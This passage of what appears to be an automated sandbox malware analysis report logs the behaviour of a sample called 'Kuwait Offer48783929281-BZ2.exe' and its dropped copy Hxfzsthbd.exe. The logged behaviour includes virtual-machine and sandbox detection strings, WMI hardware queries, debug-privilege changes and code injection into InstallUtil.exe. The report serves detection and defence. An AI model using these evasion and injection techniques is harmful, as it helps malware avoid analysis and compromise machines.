                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: Kuwait Offer48783929281-BZ2.exe PID: 7480, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Hxfzsthbd.exe PID: 8144, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory allocated: 13C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory allocated: 3060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory allocated: 5060000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 25A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 45A0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: AF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: 24B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: 44B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: C00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4890000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: 1030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: 2A90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1130000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2BB0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4BB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeCode function: 8_2_05F97FB3 sgdt fword ptr [esi]8_2_05F97FB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: InstallUtil.exe, 00000002.00000002.1477831718.0000000000974000.00000004.00000020.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1475768189.0000000000692000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1586935967.0000000005D6F000.00000004.00000020.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1560908195.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2587445459.000000000603D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348001830.0000000001413000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 602000Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63C000Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 63E000Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 591008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 6C1008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: AC8008Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeQueries volume information: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeQueries volume information: C:\Users\user\AppData\Roaming\Hxfzsthbd.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Hxfzsthbd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
